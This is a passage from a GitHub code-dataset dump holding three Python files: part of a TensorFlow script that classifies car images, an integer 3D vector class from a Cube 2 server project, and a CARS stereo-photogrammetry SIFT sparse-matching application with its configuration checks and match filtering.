range(total):\n                print('#%d : ' % i, end='')\n                v = logits.eval(feed_dict={data_placeholder: [data[i]]})\n                sm = tf.nn.softmax(v)\n                smv = sm.eval()\n#                prediction_list.append(smv[0])\n\n                cls = np.argmax(smv)  # get the class number with largest value by argmax\n                prediction_list.append(cls)\n                print('prediction=%d (%f)' % (cls, smv[0][cls]))\n\n        return prediction_list\n\ndef test_data():\n    # Testing data\n    images, labels = load_data(test_data_dir)\n    images_array = np.array(images)\n    labels_array = np.array(labels)\n\n    # Resize images\n    images32 = [transform.resize(image, (28, 28)) for image in images]\n    images32 = np.array(images32)\n    images32 = rgb2gray(np.array(images32))\n    images32 = images32.reshape(-1, 784)\n    return images, images32, labels\n\n\nROOT_PATH = \"/home/hguan/project/machine-learning/garage/\"\ntrain_data_dir = os.path.join(ROOT_PATH, \"training\")\ntest_data_dir = os.path.join(ROOT_PATH, \"testing\")\n\n# Training data\nimages, labels = load_data(train_data_dir+\"/0\")\nimages_array = np.array(images)\nlabels_array = np.array(labels)\n\n# Resize images\nimages32 = [transform.resize(image, (28, 28)) for image in images]\nimages32c = np.array(images32)\nimages32 = rgb2gray(np.array(images32c))\nimages32 = images32.reshape(-1, 784)\n\n#run_training(images32, labels)\n\nimages, images32, labels = test_data()\npredicted = run_classifier(images32)\n\n# Print the real and predicted labels\nprint(labels)\nprint(predicted)\npred_name = [\"\", \"Nissan\", \"BMW\"]\n# Display the predictions and the ground truth visually.\nfig = plt.figure(figsize=(32, 32))\nfor i in range(len(images32)):\n    print('i=', i)\n    truth = labels[i]\n    prediction = predicted[i]\n    plt.subplot(10, 6, 1+i)\n    plt.axis('off')\n    color = 'green' if truth == prediction else 'red'\n    plt.text(700, 300, \"Truth: {0}\\nPrediction: {1}\".format(truth, pred_name[prediction]),\n             fontsize=6, color=color)\n    plt.imshow(images[i])\n\nplt.show()\n","repo_name":"lakemang/garage","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":10395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71097483396","text":"from cube2common.vec import vec\n\nR = [1, 2, 0]\nC = [2, 0, 1]\nD = [0, 1, 2]\n\nclass ivec(object):\n    def __init__(self, *args):\n        self.v = [0]*3\n        \n        if len(args) == 1 and isinstance(args[0], vec):\n            v = args[0]\n            \n            self.x = v.x\n            self.y = v.y\n            self.z = v.z\n            \n        elif len(args) == 1:\n            i = args[0]\n            \n            self.x = ((i&1)>>0)\n            self.y = ((i&2)>>1)\n            self.z = ((i&4)>>2)\n            \n        elif len(args) == 3:\n            self.v = list(args)\n            \n        elif len(args) == 4:\n            d, row, col, depth = args\n            \n            self.v[R[d]] = row\n            self.v[C[d]] = col\n            self.v[D[d]] = depth\n            \n        elif len(args) == 5:\n            i, cx, cy, cz, size = args\n            \n            self.x = cx+((i&1)>>0)*size\n            self.y = cy+((i&2)>>1)*size\n            self.z = cz+((i&4)>>2)*size\n        \n    def __repr__(self):\n        return \"<ivec ({x}, {y}, {z})>\".format(x=self.x, y=self.y, z=self.z)\n    \n    def copy(self):\n        return vec(self.x, self.y, self.z)\n    \n    def __eq__(self, other):\n        if isinstance(other, ivec):\n            return self.x == other.x and self.y == other.y and self.z == other.z\n        else:\n            return False\n    \n    def __ne__(self, other):\n        if isinstance(other, ivec):\n            return self.x != other.x or self.y != other.y or self.z != other.z\n        else:\n            return False\n    \n    def __getitem__(self, index):\n        return self.v[index]\n    \n    def __setitem__(self, index, value):\n        self.v[index] = value\n    \n    @property\n    def x(self):\n        return self.v[0]\n    \n    @x.setter\n    def x(self, value):\n        self.v[0] = value\n    \n    
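The single-integer `ivec(i)` constructor above decodes an octree child index: bits 0, 1, and 2 select the x, y, and z corner offsets. Enumerating all eight children makes the mapping explicit:

```python
# Decode octree child indices into corner offsets, as ivec(i) does above.
for i in range(8):
    x, y, z = (i & 1) >> 0, (i & 2) >> 1, (i & 4) >> 2
    print(f"child {i} -> corner offset ({x}, {y}, {z})")
# child 0 -> corner offset (0, 0, 0)
# ...
# child 7 -> corner offset (1, 1, 1)
```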
@property\n def y(self):\n return self.v[1]\n \n @y.setter\n def y(self, value):\n self.v[1] = value\n \n @property\n def z(self):\n return self.v[2]\n \n @z.setter\n def z(self, value):\n self.v[2] = value\n \n @property\n def r(self):\n return self.v[0]\n \n @r.setter\n def r(self, value):\n self.v[0] = value\n \n @property\n def g(self):\n return self.v[1]\n \n @g.setter\n def g(self, value):\n self.v[1] = value\n \n @property\n def b(self):\n return self.v[2]\n \n @b.setter\n def b(self, value):\n self.v[2] = value\n \n def iszero(self):\n return self.x == 0 and self.y == 0 and self.z == 0\n \n def shl(self, n):\n self.x <<= n\n self.y <<= n\n self.z <<= n\n \n def shr(self, n):\n self.x >>= n\n self.y >>= n\n self.z >>= n\n \n def mul(self, item):\n if isinstance(item, ivec):\n self.x *= item.x\n self.y *= item.y\n self.z *= item.z\n else:\n self.x *= item\n self.y *= item\n self.z *= item\n return self\n \n def div(self, item):\n if isinstance(item, ivec):\n self.x /= item.x\n self.y /= item.y\n self.z /= item.z\n else:\n self.x /= item\n self.y /= item\n self.z /= item\n return self\n \n def add(self, item):\n if isinstance(item, ivec):\n self.x += item.x\n self.y += item.y\n self.z += item.z\n else:\n self.x += item\n self.y += item\n self.z += item\n return self\n \n def sub(self, item):\n if isinstance(item, ivec):\n self.x -= item.x\n self.y -= item.y\n self.z -= item.z\n else:\n self.x -= item\n self.y -= item\n self.z -= item\n return self\n \n def mask(self, n):\n self.x &= n\n self.y &= n\n self.z &= n\n return self\n","repo_name":"FraMecca/CipollaMod","sub_path":"src/cube2common/ivec.py","file_name":"ivec.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16921804295","text":"import logging\nimport math\nimport os\nfrom typing import Dict, Tuple\n\n# Third party imports\nimport numpy as np\nimport pandas\nimport xarray as xr\nfrom json_checker import And, Checker, Or\n\nimport cars.applications.sparse_matching.sparse_matching_constants as sm_cst\nimport cars.orchestrator.orchestrator as ocht\nfrom cars.applications import application_constants\n\n# CARS imports\nfrom cars.applications.sparse_matching import sparse_matching_tools\nfrom cars.applications.sparse_matching.sparse_matching import SparseMatching\nfrom cars.core import constants as cst\nfrom cars.core.utils import safe_makedirs\nfrom cars.data_structures import cars_dataset\n\n\nclass Sift(SparseMatching, short_name=\"sift\"):\n \"\"\"\n SparseMatching\n \"\"\"\n\n # pylint: disable=too-many-instance-attributes\n\n def __init__(self, conf=None):\n \"\"\"\n Init function of SparseMatching\n\n :param conf: configuration for matching\n :return: a application_to_use object\n \"\"\"\n\n super().__init__(conf=conf)\n\n # check conf\n self.used_method = self.used_config[\"method\"]\n self.disparity_margin = self.used_config[\"disparity_margin\"]\n self.elevation_delta_lower_bound = self.used_config[\n \"elevation_delta_lower_bound\"\n ]\n self.elevation_delta_upper_bound = self.used_config[\n \"elevation_delta_upper_bound\"\n ]\n self.epipolar_error_upper_bound = self.used_config[\n \"epipolar_error_upper_bound\"\n ]\n self.epipolar_error_maximum_bias = self.used_config[\n \"epipolar_error_maximum_bias\"\n ]\n\n # outlier filtering (used after application run, to filter matches)\n self.disparity_outliers_rejection_percent = self.used_config[\n \"disparity_outliers_rejection_percent\"\n ]\n\n # minimum number of matches 
to continue with\n self.minimum_nb_matches = self.used_config[\"minimum_nb_matches\"]\n\n # sifts\n self.sift_matching_threshold = self.used_config[\n \"sift_matching_threshold\"\n ]\n self.sift_n_octave = self.used_config[\"sift_n_octave\"]\n self.sift_n_scale_per_octave = self.used_config[\n \"sift_n_scale_per_octave\"\n ]\n self.sift_peak_threshold = self.used_config[\"sift_peak_threshold\"]\n self.sift_edge_threshold = self.used_config[\"sift_edge_threshold\"]\n self.sift_magnification = self.used_config[\"sift_magnification\"]\n self.sift_back_matching = self.used_config[\"sift_back_matching\"]\n\n # sifts filter\n self.matches_filter_knn = self.used_config[\"matches_filter_knn\"]\n self.matches_filter_dev_factor = self.used_config[\n \"matches_filter_dev_factor\"\n ]\n\n # Saving files\n self.save_matches = self.used_config[\"save_matches\"]\n\n # Init orchestrator\n self.orchestrator = None\n\n def check_conf(self, conf):\n \"\"\"\n Check configuration\n\n :param conf: configuration to check\n :type conf: dict\n\n :return: overloaded configuration\n :rtype: dict\n\n \"\"\"\n\n # init conf\n if conf is not None:\n overloaded_conf = conf.copy()\n else:\n conf = {}\n overloaded_conf = {}\n\n # Overload conf\n overloaded_conf[\"method\"] = conf.get(\"method\", \"sift\")\n overloaded_conf[\"disparity_margin\"] = conf.get(\"disparity_margin\", 0.02)\n overloaded_conf[\"elevation_delta_lower_bound\"] = conf.get(\n \"elevation_delta_lower_bound\", -9000\n )\n overloaded_conf[\"elevation_delta_upper_bound\"] = conf.get(\n \"elevation_delta_upper_bound\", 9000\n )\n overloaded_conf[\"epipolar_error_upper_bound\"] = conf.get(\n \"epipolar_error_upper_bound\", 10.0\n )\n overloaded_conf[\"epipolar_error_maximum_bias\"] = conf.get(\n \"epipolar_error_maximum_bias\", 0.0\n )\n # outliers rejections used for matches filtering\n overloaded_conf[\"disparity_outliers_rejection_percent\"] = conf.get(\n \"disparity_outliers_rejection_percent\", 0.1\n )\n\n # minimum number of matches to continue with\n overloaded_conf[\"minimum_nb_matches\"] = conf.get(\n \"minimum_nb_matches\", 100\n )\n\n # sifts params\n overloaded_conf[\"sift_matching_threshold\"] = conf.get(\n \"sift_matching_threshold\", 0.6\n )\n overloaded_conf[\"sift_n_octave\"] = conf.get(\"sift_n_octave\", 8)\n overloaded_conf[\"sift_n_scale_per_octave\"] = conf.get(\n \"sift_n_scale_per_octave\", 3\n )\n overloaded_conf[\"sift_peak_threshold\"] = conf.get(\n \"sift_peak_threshold\", None\n )\n overloaded_conf[\"sift_edge_threshold\"] = conf.get(\n \"sift_edge_threshold\", 5.0\n )\n overloaded_conf[\"sift_magnification\"] = conf.get(\n \"sift_magnification\", 2.0\n )\n overloaded_conf[\"sift_back_matching\"] = conf.get(\n \"sift_back_matching\", True\n )\n\n # sifts filter params\n overloaded_conf[\"matches_filter_knn\"] = conf.get(\n \"matches_filter_knn\", 25\n )\n overloaded_conf[\"matches_filter_dev_factor\"] = conf.get(\n \"matches_filter_dev_factor\", 3.0\n )\n\n # Saving files\n overloaded_conf[\"save_matches\"] = conf.get(\"save_matches\", False)\n self.save_matches = overloaded_conf[\"save_matches\"]\n\n sparse_matching_schema = {\n \"method\": str,\n \"disparity_margin\": float,\n \"disparity_outliers_rejection_percent\": And(\n float, lambda x: x >= 0, lambda x: x <= 1\n ),\n \"minimum_nb_matches\": And(int, lambda x: x > 0),\n \"elevation_delta_lower_bound\": Or(int, float, None),\n \"elevation_delta_upper_bound\": Or(int, float, None),\n \"epipolar_error_upper_bound\": And(float, lambda x: x > 0),\n 
\"epipolar_error_maximum_bias\": And(float, lambda x: x >= 0),\n            \"sift_matching_threshold\": And(float, lambda x: x > 0),\n            \"sift_n_octave\": And(int, lambda x: x > 0),\n            \"sift_n_scale_per_octave\": And(int, lambda x: x > 0),\n            \"sift_peak_threshold\": Or(float, None),\n            \"sift_edge_threshold\": float,\n            \"sift_magnification\": And(float, lambda x: x > 0),\n            \"sift_back_matching\": bool,\n            \"matches_filter_knn\": int,\n            \"matches_filter_dev_factor\": Or(int, float),\n            \"save_matches\": bool,\n        }\n\n        # Check conf\n        checker = Checker(sparse_matching_schema)\n        checker.validate(overloaded_conf)\n\n        # Check consistency between bounds for elevation delta\n        elevation_delta_lower_bound = overloaded_conf[\n            \"elevation_delta_lower_bound\"\n        ]\n        elevation_delta_upper_bound = overloaded_conf[\n            \"elevation_delta_upper_bound\"\n        ]\n        if None not in (\n            elevation_delta_lower_bound,\n            elevation_delta_upper_bound,\n        ):\n            if elevation_delta_lower_bound > elevation_delta_upper_bound:\n                raise ValueError(\n                    \"Upper bound must be greater than \"\n                    \"lower bound for expected elevation delta\"\n                )\n\n        return overloaded_conf\n\n    def get_save_matches(self):\n        \"\"\"\n        Get save_matches parameter\n\n        :return: True if save_matches is activated\n        :rtype: bool\n        \"\"\"\n\n        return self.save_matches\n\n    def get_disparity_margin(self):\n        \"\"\"\n        Get disparity margin corresponding to sparse matches\n\n        :return: margin in percent\n\n        \"\"\"\n        return self.disparity_margin\n\n    def get_matches_filter_knn(self):\n        \"\"\"\n        Get matches_filter_knn :\n        number of neighbors used to measure isolation of matches\n\n        :return: matches_filter_knn\n\n        \"\"\"\n        return self.matches_filter_knn\n\n    def get_matches_filter_dev_factor(self):\n        \"\"\"\n        Get matches_filter_dev_factor :\n        deviation factor in the formula\n        used to compute the outlier threshold\n\n        :return: matches_filter_dev_factor\n\n        \"\"\"\n        return self.matches_filter_dev_factor\n\n    def get_margins_fun(self, disp_min=None, disp_max=None):\n        \"\"\"\n        Get margins function to use in resampling\n\n        :param disp_min: disp min for info\n        :param disp_max: disp max for info\n\n        :return: margins function\n        :rtype: function generating xr.Dataset\n\n        \"\"\"\n\n        # Compute margins\n        corner = [\"left\", \"up\", \"right\", \"down\"]\n        data = np.zeros(len(corner))\n        col = np.arange(len(corner))\n        margins = xr.Dataset(\n            {\"left_margin\": ([\"col\"], data)}, coords={\"col\": col}\n        )\n        margins[\"right_margin\"] = xr.DataArray(data, dims=[\"col\"])\n\n        # Compute margins for right region\n        margins[\"right_margin\"].data = [\n            int(\n                math.floor(\n                    self.epipolar_error_upper_bound\n                    + self.epipolar_error_maximum_bias\n                )\n            ),\n            int(\n                math.floor(\n                    self.epipolar_error_upper_bound\n                    + self.epipolar_error_maximum_bias\n                )\n            ),\n            int(\n                math.floor(\n                    self.epipolar_error_upper_bound\n                    + self.epipolar_error_maximum_bias\n                )\n            ),\n            int(\n                math.ceil(\n                    self.epipolar_error_upper_bound\n                    + self.epipolar_error_maximum_bias\n                )\n            ),\n        ]\n\n        # add disp range info\n        margins.attrs[\"disp_min\"] = disp_min\n        margins.attrs[\"disp_max\"] = disp_max\n\n        logging.info(\n            \"Margins added to right region for matching: {}\".format(\n                margins[\"right_margin\"].data\n            )\n        )\n\n        def margins_wrapper(  # pylint: disable=unused-argument\n            row_min, row_max, col_min, col_max\n        ):\n            \"\"\"\n            Generates margins Dataset used in resampling\n\n            :param row_min: row min\n            :param row_max: row max\n            :param col_min: col min\n            :param col_max: col max\n\n            :return: margins\n            :rtype: xr.Dataset\n            \"\"\"\n\n            # Constant margins for all tiles\n            return margins\n\n        return margins_wrapper\n\n    
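`check_conf` above validates the overloaded configuration with json_checker; the same `And`/`Or`/`Checker` combinators work standalone. A trimmed sketch (the tiny schema below is illustrative, not the full one used by the application):

```python
# Validate a config dict against a json_checker schema.
from json_checker import And, Checker, Or

schema = {
    "method": str,
    "disparity_margin": float,
    "minimum_nb_matches": And(int, lambda x: x > 0),
    "sift_peak_threshold": Or(float, None),
}
conf = {
    "method": "sift",
    "disparity_margin": 0.02,
    "minimum_nb_matches": 100,
    "sift_peak_threshold": None,
}
Checker(schema).validate(conf)  # raises if conf does not match the schema
```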
def run(\n        self,\n        epipolar_images_left,\n        epipolar_images_right,\n        disp_to_alt_ratio,\n        orchestrator=None,\n        pair_folder=None,\n        pair_key=\"PAIR_0\",\n    ):\n        \"\"\"\n        Run Matching application.\n\n        Create left and right CarsDataset filled with pandas.DataFrame,\n        corresponding to epipolar 2D disparities, on the same geometry\n        as epipolar_images_left and epipolar_images_right.\n\n        :param epipolar_images_left: tiled left epipolar. CarsDataset contains:\n\n                - N x M Delayed tiles \\\n                    Each tile will be a future xarray Dataset containing:\n\n                    - data with keys : \"im\", \"msk\", \"color\"\n                    - attrs with keys: \"margins\" with \"disp_min\" and \"disp_max\"\n                        \"transform\", \"crs\", \"valid_pixels\", \"no_data_mask\",\n                        \"no_data_img\"\n                - attributes containing:\n                    \"largest_epipolar_region\",\"opt_epipolar_tile_size\"\n        :type epipolar_images_left: CarsDataset\n        :param epipolar_images_right: tiled right epipolar. CarsDataset contains:\n\n                - N x M Delayed tiles \\\n                    Each tile will be a future xarray Dataset containing:\n\n                    - data with keys : \"im\", \"msk\", \"color\"\n                    - attrs with keys: \"margins\" with \"disp_min\" and \"disp_max\"\\\n                        \"transform\", \"crs\", \"valid_pixels\", \"no_data_mask\",\\\n                        \"no_data_img\"\n                - attributes containing:\"largest_epipolar_region\", \\\n                    \"opt_epipolar_tile_size\"\n        :type epipolar_images_right: CarsDataset\n        :param disp_to_alt_ratio: disp to alti ratio\n        :type disp_to_alt_ratio: float\n        :param orchestrator: orchestrator used\n        :param pair_folder: folder used for current pair\n        :type pair_folder: str\n        :param pair_key: pair key id\n        :type pair_key: str\n\n        :return: left matches, right matches. Each CarsDataset contains:\n\n            - N x M Delayed tiles \\\n                Each tile will be a future pandas DataFrame containing:\n                - data : (L, 4) shape matches\n            - attributes containing \"disp_lower_bound\",  \"disp_upper_bound\",\\\n                \"elevation_delta_lower_bound\",\"elevation_delta_upper_bound\"\n\n        :rtype: Tuple(CarsDataset, CarsDataset)\n        \"\"\"\n\n        # Default orchestrator\n        if orchestrator is None:\n            # Create default sequential orchestrator for current application\n            # be aware: no out_json will be shared between orchestrators\n            # No files saved\n            self.orchestrator = ocht.Orchestrator(\n                orchestrator_conf={\"mode\": \"sequential\"}\n            )\n        else:\n            self.orchestrator = orchestrator\n\n        if pair_folder is None:\n            pair_folder = os.path.join(self.orchestrator.out_dir, \"tmp\")\n            safe_makedirs(pair_folder)\n\n        if epipolar_images_left.dataset_type == \"arrays\":\n            # Create CarsDataset\n            # Epipolar_disparity\n            epipolar_disparity_map_left = cars_dataset.CarsDataset(\"points\")\n            epipolar_disparity_map_left.create_empty_copy(epipolar_images_left)\n\n            # Update attributes to get epipolar info\n            epipolar_disparity_map_left.attributes.update(\n                epipolar_images_left.attributes\n            )\n            # check sift_peak_threshold with image type\n            # only if sift_peak_threshold is None\n            tmp_sift_peak_threshold = self.sift_peak_threshold\n            if not self.sift_peak_threshold:\n                logging.info(\"The sift_peak_threshold is set to auto-mode.\")\n                # sift_peak_threshold is None or not specified\n                # check input type\n                if np.issubdtype(\n                    epipolar_disparity_map_left.attributes[\"image_type\"],\n                    np.uint8,\n                ):\n                    tmp_sift_peak_threshold = 1\n                else:\n                    tmp_sift_peak_threshold = 20\n                logging.info(\n                    \"The sift_peak_threshold will be set to {}.\".format(\n                        tmp_sift_peak_threshold\n                    )\n                )\n                self.sift_peak_threshold = tmp_sift_peak_threshold\n\n            # Save matches\n            if self.save_matches:\n                
self.orchestrator.add_to_save_lists(\n os.path.join(pair_folder, \"epi_matches_left.tif\"),\n None,\n epipolar_disparity_map_left,\n cars_ds_name=\"epi_matches_left\",\n )\n\n # Get max window size\n image_tiling_grid = epipolar_images_left.tiling_grid\n\n max_window_col_size = np.max(\n image_tiling_grid[:, :, 3] - image_tiling_grid[:, :, 2]\n )\n\n # Compute disparity range\n if self.elevation_delta_lower_bound is None:\n disp_lower_bound = -np.inf\n min_offset = -image_tiling_grid.shape[0]\n else:\n disp_lower_bound = (\n self.elevation_delta_lower_bound / disp_to_alt_ratio\n )\n min_offset = math.floor(disp_lower_bound / max_window_col_size)\n if self.elevation_delta_upper_bound is None:\n disp_upper_bound = np.inf\n max_offset = image_tiling_grid.shape[0]\n else:\n disp_upper_bound = (\n self.elevation_delta_upper_bound / disp_to_alt_ratio\n )\n max_offset = math.ceil(disp_upper_bound / max_window_col_size)\n\n offsets = range(min_offset, max_offset + 1)\n\n attributes = {\n \"disp_lower_bound\": disp_lower_bound,\n \"disp_upper_bound\": disp_upper_bound,\n \"elevation_delta_lower_bound\": self.elevation_delta_lower_bound,\n \"elevation_delta_upper_bound\": self.elevation_delta_upper_bound,\n }\n\n epipolar_disparity_map_left.attributes.update(attributes)\n\n # Get saving infos in order to save tiles when they are computed\n [saving_info_left] = self.orchestrator.get_saving_infos(\n [epipolar_disparity_map_left]\n )\n\n # Update orchestrator out_json\n updating_infos = {\n application_constants.APPLICATION_TAG: {\n pair_key: {\n sm_cst.SPARSE_MATCHING_RUN_TAG: {\n sm_cst.DISP_LOWER_BOUND: disp_lower_bound,\n sm_cst.DISP_UPPER_BOUND: disp_upper_bound,\n },\n }\n }\n }\n orchestrator.update_out_info(updating_infos)\n logging.info(\n \"Generate disparity: Number tiles: {}\".format(\n epipolar_disparity_map_left.shape[1]\n * epipolar_disparity_map_left.shape[0]\n )\n )\n\n # Add to replace list so tiles will be readable at the same time\n self.orchestrator.add_to_replace_lists(\n epipolar_disparity_map_left, cars_ds_name=\"epi_matches_left\"\n )\n\n # Generate disparity maps\n for col in range(epipolar_disparity_map_left.shape[1]):\n for row in range(epipolar_disparity_map_left.shape[0]):\n # initialize list of matches\n delayed_matches_row_col = []\n # iterate on offsets\n for offset in offsets:\n if (\n 0\n <= col + offset\n < epipolar_disparity_map_left.shape[1]\n ):\n # Compute matches\n if type(None) not in (\n type(epipolar_images_left[row, col]),\n type(epipolar_images_right[row, col + offset]),\n ):\n delayed_matches_row_col.append(\n self.orchestrator.cluster.create_task(\n compute_matches, nout=1\n )(\n epipolar_images_left[row, col],\n epipolar_images_right[\n row, col + offset\n ],\n matching_threshold=(\n self.sift_matching_threshold\n ),\n n_octave=self.sift_n_octave,\n n_scale_per_octave=(\n self.sift_n_scale_per_octave\n ),\n peak_threshold=tmp_sift_peak_threshold,\n edge_threshold=self.sift_edge_threshold,\n magnification=self.sift_magnification,\n backmatching=self.sift_back_matching,\n disp_lower_bound=disp_lower_bound,\n disp_upper_bound=disp_upper_bound,\n )\n )\n\n # Merge matches corresponding to left tile\n if len(delayed_matches_row_col) > 0:\n # update saving_info with row and col\n full_saving_info_left = ocht.update_saving_infos(\n saving_info_left, row=row, col=col\n )\n\n (\n epipolar_disparity_map_left[row, col]\n ) = self.orchestrator.cluster.create_task(\n merge_matches, nout=1\n )(\n delayed_matches_row_col,\n saving_info_left=full_saving_info_left,\n 
)\n\n        else:\n            logging.error(\n                \"SparseMatching application doesn't \"\n                \"support this input data format\"\n            )\n\n        return epipolar_disparity_map_left, None\n\n    def filter_matches(\n        self,\n        epipolar_matches_left,\n        orchestrator=None,\n        pair_key=\"pair_0\",\n        pair_folder=None,\n        save_matches=False,\n    ):\n        \"\"\"\n        Transform matches CarsDataset to numpy matches, and filter matches\n\n        :param cars_orchestrator: orchestrator\n        :param epipolar_matches_left: matches. CarsDataset contains:\n\n            - N x M Delayed tiles \\\n                Each tile will be a future pandas DataFrame containing:\n\n                - data : (L, 4) shape matches\n            - attributes containing \"disp_lower_bound\",  \"disp_upper_bound\", \\\n                \"elevation_delta_lower_bound\",\"elevation_delta_upper_bound\"\n        :type epipolar_matches_left: CarsDataset\n        :param save_matches: True if matches need to be saved\n        :type save_matches: bool\n\n        :return: filtered matches\n        :rtype: np.ndarray\n\n        \"\"\"\n\n        # Default orchestrator\n        if orchestrator is None:\n            # Create default sequential orchestrator for current application\n            # be aware: no out_json will be shared between orchestrators\n            # No files saved\n            cars_orchestrator = ocht.Orchestrator(\n                orchestrator_conf={\"mode\": \"sequential\"}\n            )\n        else:\n            cars_orchestrator = orchestrator\n\n        if pair_folder is None:\n            pair_folder = os.path.join(cars_orchestrator.out_dir, \"tmp\")\n            safe_makedirs(pair_folder)\n\n        epipolar_error_upper_bound = self.epipolar_error_upper_bound\n        epipolar_error_maximum_bias = self.epipolar_error_maximum_bias\n\n        # Compute grid correction\n\n        # Concatenated matches\n        list_matches = []\n        for row in range(epipolar_matches_left.shape[0]):\n            for col in range(epipolar_matches_left.shape[1]):\n                # CarsDataset containing Pandas DataFrame, not Delayed anymore\n                list_matches.append(epipolar_matches_left[row, col])\n\n        matches = pandas.concat(\n            list_matches,\n            ignore_index=True,\n            sort=False,\n        ).to_numpy()\n\n        raw_nb_matches = matches.shape[0]\n\n        logging.info(\n            \"Raw number of matches found: {} matches\".format(raw_nb_matches)\n        )\n\n        # Export matches\n        raw_matches_array_path = None\n        if save_matches:\n            logging.info(\"Writing raw matches file\")\n            raw_matches_array_path = os.path.join(\n                pair_folder, \"raw_matches.npy\"\n            )\n            np.save(raw_matches_array_path, matches)\n\n        # Filter matches that are out of margin\n        if epipolar_error_maximum_bias == 0:\n            epipolar_median_shift = 0\n        else:\n            epipolar_median_shift = np.median(matches[:, 3] - matches[:, 1])\n\n        matches = matches[\n            ((matches[:, 3] - matches[:, 1]) - epipolar_median_shift)\n            >= -epipolar_error_upper_bound\n        ]\n        matches = matches[\n            ((matches[:, 3] - matches[:, 1]) - epipolar_median_shift)\n            <= epipolar_error_upper_bound\n        ]\n\n        matches_discarded_message = \"{} matches discarded \\\n            because their epipolar error is greater \\\n            than --epipolar_error_upper_bound = {} pix\".format(\n            raw_nb_matches - matches.shape[0], epipolar_error_upper_bound\n        )\n\n        if epipolar_error_maximum_bias != 0:\n            matches_discarded_message += (\n                \" considering a shift of {} pix\".format(epipolar_median_shift)\n            )\n\n        logging.info(matches_discarded_message)\n\n        filtered_matches_array_path = None\n        if save_matches:\n            logging.info(\"Writing filtered matches file\")\n            filtered_matches_array_path = os.path.join(\n                pair_folder, \"filtered_matches.npy\"\n            )\n            np.save(filtered_matches_array_path, matches)\n\n        # Retrieve number of matches\n        nb_matches = matches.shape[0]\n\n        # Check if we have enough matches\n        # TODO: we could also make it a warning and continue\n        # with 
uncorrected grid\n # and default disparity range\n if nb_matches < self.minimum_nb_matches:\n error_message_matches = (\n \"Insufficient amount of matches found ({} < {}), \"\n \"can not safely estimate epipolar error correction \"\n \" and disparity range\".format(\n nb_matches, self.minimum_nb_matches\n )\n )\n logging.error(error_message_matches)\n raise ValueError(error_message_matches)\n\n logging.info(\n \"Number of matches kept for epipolar \"\n \"error correction: {} matches\".format(nb_matches)\n )\n\n # Compute epipolar error\n epipolar_error = matches[:, 1] - matches[:, 3]\n epi_error_mean = np.mean(epipolar_error)\n epi_error_std = np.std(epipolar_error)\n epi_error_max = np.max(np.fabs(epipolar_error))\n logging.info(\n \"Epipolar error before correction: mean = {:.3f} pix., \"\n \"standard deviation = {:.3f} pix., max = {:.3f} pix.\".format(\n epi_error_mean,\n epi_error_std,\n epi_error_max,\n )\n )\n\n # Update orchestrator out_json\n raw_matches_infos = {\n application_constants.APPLICATION_TAG: {\n pair_key: {\n sm_cst.MATCHES_FILTERING_TAG: {\n sm_cst.RAW_MATCHES_TAG: raw_matches_array_path,\n sm_cst.FILTERED_MATCHES_TAG: (\n filtered_matches_array_path\n ),\n sm_cst.NUMBER_MATCHES_TAG: nb_matches,\n sm_cst.RAW_NUMBER_MATCHES_TAG: raw_nb_matches,\n sm_cst.BEFORE_CORRECTION_EPI_ERROR_MEAN: epi_error_mean,\n sm_cst.BEFORE_CORRECTION_EPI_ERROR_STD: epi_error_std,\n sm_cst.BEFORE_CORRECTION_EPI_ERROR_MAX: epi_error_max,\n }\n }\n }\n }\n cars_orchestrator.update_out_info(raw_matches_infos)\n\n return matches\n\n\ndef compute_matches(\n left_image_object: xr.Dataset,\n right_image_object: xr.Dataset,\n matching_threshold=None,\n n_octave=None,\n n_scale_per_octave=None,\n peak_threshold=None,\n edge_threshold=None,\n magnification=None,\n backmatching=None,\n disp_lower_bound=None,\n disp_upper_bound=None,\n) -> Dict[str, Tuple[xr.Dataset, xr.Dataset]]:\n \"\"\"\n Compute matches from image objects.\n This function will be run as a delayed task.\n\n User must provide saving infos to save properly created datasets\n\n :param left_image_object: tiled Left image dataset with :\n\n - cst.EPI_IMAGE\n - cst.EPI_MSK (if given)\n - cst.EPI_COLOR (for left, if given)\n :type left_image_object: xr.Dataset with :\n\n - cst.EPI_IMAGE\n - cst.EPI_MSK (if given)\n - cst.EPI_COLOR (for left, if given)\n :param right_image_object: tiled Right image\n :type right_image_object: xr.Dataset\n\n\n :return: Left matches object, Right matches object (if exists)\n\n Returned objects are composed of :\n\n - dataframe (None for right object) with :\n - TODO\n \"\"\"\n\n # Create mask\n # TODO : remove overwriting of EPI_MSK\n saved_left_mask = np.copy(left_image_object[cst.EPI_MSK].values)\n saved_right_mask = np.copy(right_image_object[cst.EPI_MSK].values)\n\n # Compute matches\n matches = sparse_matching_tools.dataset_matching(\n left_image_object,\n right_image_object,\n matching_threshold=matching_threshold,\n n_octave=n_octave,\n n_scale_per_octave=n_scale_per_octave,\n peak_threshold=peak_threshold,\n edge_threshold=edge_threshold,\n magnification=magnification,\n backmatching=backmatching,\n )\n\n # Filter matches outside disparity range\n if disp_lower_bound is not None and disp_upper_bound is not None:\n filtered_nb_matches = matches.shape[0]\n\n matches = matches[matches[:, 2] - matches[:, 0] >= disp_lower_bound]\n matches = matches[matches[:, 2] - matches[:, 0] <= disp_upper_bound]\n\n logging.debug(\n \"{} matches discarded because they fall outside of disparity range \"\n \"defined by 
--elevation_delta_lower_bound and \"\n \"--elevation_delta_upper_bound: [{} pix., {} pix.]\".format(\n filtered_nb_matches - matches.shape[0],\n disp_lower_bound,\n disp_upper_bound,\n )\n )\n else:\n logging.debug(\"Matches outside disparity range were not filtered\")\n\n # convert to Dataframe\n left_matches_dataframe = pandas.DataFrame(matches)\n\n # recover initial mask data in input images\n # TODO remove with proper dataset creation\n left_image_object[cst.EPI_MSK].values = saved_left_mask\n right_image_object[cst.EPI_MSK].values = saved_right_mask\n\n return left_matches_dataframe\n\n\ndef merge_matches(list_of_matches, saving_info_left=None):\n \"\"\"\n Concatenate matches\n\n :param list_of_matches: list of matches\n :type list_of_matches: list(pandas.DataFrame)\n\n \"\"\"\n concatenated_matches = pandas.concat(\n list_of_matches,\n ignore_index=True,\n sort=False,\n )\n\n cars_dataset.fill_dataframe(\n concatenated_matches, saving_info=saving_info_left, attributes=None\n )\n\n return 